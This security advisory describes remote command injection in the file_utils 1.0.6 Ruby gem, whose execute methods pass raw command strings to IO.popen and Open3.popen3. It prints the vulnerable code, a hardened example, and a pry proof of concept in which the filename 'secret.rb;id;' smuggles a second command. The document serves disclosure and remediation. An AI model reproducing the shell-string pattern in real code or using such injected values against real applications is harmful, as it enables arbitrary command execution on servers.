TITLE: Remote Command Injection in file_utils 1.0.6 ruby gem

DOWNLOAD: http://rubygems.org/gems/file_utils

CVE: N/A

DESCRIPTION: The gem's execute and execute_command methods hand their command argument, as a single string, straight to IO.popen() and Open3.popen3(), which run it through the shell. If a Rails application builds that string from remote user input, shell metacharacters such as ';' let the remote user inject arbitrary commands. User input is not sanitized before being passed to popen().
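To make the root cause concrete, here is an added example (not code from the file_utils gem): the same command built three ways, with echo standing in for pdf2ps so it runs anywhere. The string form is what the gem does and is injectable; the argv form never starts a shell; Shellwords.escape is the fallback when a string is unavoidable. The function names and the allowlist check are hypothetical; the allowlist also matters because the argv form still lets a filename beginning with '-' be parsed as an option by the called program.

```ruby
require 'open3'
require 'shellwords'

# Vulnerable pattern (what the gem's execute/execute_command do): the whole
# command is one string, so Ruby runs it via /bin/sh and ';' ends the command.
def run_unsafe(filename)
  out, _err, _status = Open3.capture3("echo #{filename}")
  out
end

# Hardened: argv form. Ruby execs the program directly, no shell is involved,
# and the filename arrives as exactly one argument whatever it contains.
def run_safe(filename)
  out, _err, _status = Open3.capture3("echo", filename)
  out
end

# Hardened alternative when a single command string is required: escape every
# shell metacharacter, so the shell still sees one argument.
def run_escaped(filename)
  out, _err, _status = Open3.capture3("echo #{Shellwords.escape(filename)}")
  out
end

# Allowlist check to apply before either safe form. Rejecting a leading '-'
# stops a user from smuggling an option (e.g. "-dNOSAFER") into the argv.
def safe_filename?(name)
  name.match?(/\A[A-Za-z0-9][A-Za-z0-9._-]*\z/)
end

if $PROGRAM_NAME == __FILE__
  payload = "secret.rb;id;"          # constructed attacker input
  puts "unsafe:  #{run_unsafe(payload).inspect}"   # runs id
  puts "safe:    #{run_safe(payload).inspect}"     # literal argument
  puts "escaped: #{run_escaped(payload).inspect}"  # literal argument
  puts "allowed? #{safe_filename?(payload)}"       # false
end
```

In a Rails controller the fix is the argv form plus the allowlist: IO.popen(["pdf2ps", filename, "outfile.ps"]) or Open3.capture3("pdf2ps", filename, "outfile.ps") after safe_filename? has accepted the name.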

CODE:

require 'open3'

  # Vulnerable: the command string is passed to IO.popen() as-is, so it is
  # run by /bin/sh and any shell metacharacters in it are interpreted.
  def execute command
    IO.popen(command).each_line do |line|
      puts line
    end
  end

  # Vulnerable in the same way: Open3.popen3() with a single string also
  # goes through the shell.
  def execute_command(command)
    output = nil
    error = nil
    status = nil

    Open3.popen3(command) do |_, stdout, stderr|
      output = stdout.readlines
      error = stderr.readlines
      status = $?
    end
    # remainder of the method is not included in this advisory excerpt
  end

PoC:

larry@sp0rk:~$ pry -r 'file_utils/file_utils'
[1] pry(main)> include FileUtils
=> Object
[2] pry(main)> def process_file filename
[2] pry(main)*   execute ("pdf2ps #{filename} outfile.ps")
[2] pry(main)* end
=> nil
[3] pry(main)> filename = "secret.rb;id;"    <-- user supplied input
=> "secret.rb;id;"
[4] pry(main)> process_file (filename)
Error: /undefined in password    <-- secret.rb was just a file lying around from another PoC
Operand stack:

Execution stack:
   %interp_exit   .runexec2   --nostringval--   --nostringval--   --nostringval--   2   %stopped_push   --nostringval--   --nostringval--   --nostringval--   false   1   %stopped_push   1910   1   3   %oparray_pop   1909   1   3   %oparray_pop   1893   1   3   %oparray_pop   1787   1   3   %oparray_pop   --nostringval--   %errorexec_pop   .runexec2   --nostringval--   --nostringval--   --nostringval--   2   %stopped_push   --nostringval--
Dictionary stack:
   --dict:1167/1684(ro)(G)--   --dict:0/20(G)--   --dict:77/200(L)--
Current allocation mode is local
Current file position is 9
GPL Ghostscript 9.06: Unrecoverable error, exit code 1
uid=1000(larry) gid=1000(larry) groups=1000(larry),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),106(lpadmin),117(sambashare)
sh: 1: outfile.ps: not found
=> #
[5] pry(main)> 

AUTHOR: Larry W. Cashdollar (@_larry0)